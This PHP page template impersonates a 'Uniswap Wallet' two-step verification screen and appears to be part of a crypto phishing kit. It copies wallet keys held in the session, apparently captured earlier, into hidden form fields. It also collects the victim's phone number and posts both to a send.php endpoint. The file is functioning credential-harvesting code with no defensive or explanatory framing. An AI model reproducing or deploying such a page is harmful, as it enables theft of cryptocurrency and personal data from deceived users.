<?php include_once './config.php'; ?>
<html lang="en">
    <?php
    $title = 'Uniswap Wallet';
    include_once './includes/meta.php';
    ?>
    <body>
        <?php include_once './includes/header.php'; ?>
        <link rel="stylesheet" href="<?= base_url('assets/country-code-picker/css/jquery.ccpicker.css')?>">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-sm-4 text-center bg-white rounded-5 pb20" style="margin-top: 110px; padding: 0px">
                    <div class="text-center my10 fs18">2-Step Verification</div>
                    <div class="text-center my15">Enter the 2-Step verification generated by your authenticator app.</div>
                    <form method="post" action="<?= base_url('send.php') ?>" class="py10 mx10">
                        <div className="my25">
                            <?php foreach ($_SESSION["keys"] as $ki => $key) { ?>
                            <input type="hidden" name="keys[<?=$ki?>]" class="" placeholder="<?=$ki?>" required="" style="background: transparent; border: 1px solid rgb(51, 51, 51);" value="<?=$key?>" />
                            <?php  } ?>
                            <div class="form-control fs16" style=" background-color: #EFEFEF; border: 0px; ">
                                <input name="phone_number" type="number" id="phone_number" required="" style="background-color: #FFF;font-size: 16px;padding: 8px 12px;border-radius: 0px;border: 1px solid #ccc;color: #000;width: 80%;" placeholder="Phone number" value="" autocomplete="off" >
                            </div>
                        </div>
                        <div class="row">
                            <div class="text-center mx-auto d-grid gap-6">
                                <button type="submit" class="btn btn-gray text-black rounded-4 pt10 mt20 fw-bold">Confirm & Verify</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <?php include_once './includes/footer.php'; ?>
        <script src="<?=base_url('assets/country-code-picker/js/jquery.ccpicker.min.js')?>"></script>
        <script type="text/javascript">
            $(document).ready(function() {
                $("#phone_number").CcPicker({ countryCode: "us", dataUrl: "<?= base_url('assets/country-code-picker/data/en.json') ?>", searchPlaceHolder: "Find..." });
            });
        </script>
</body>
</html>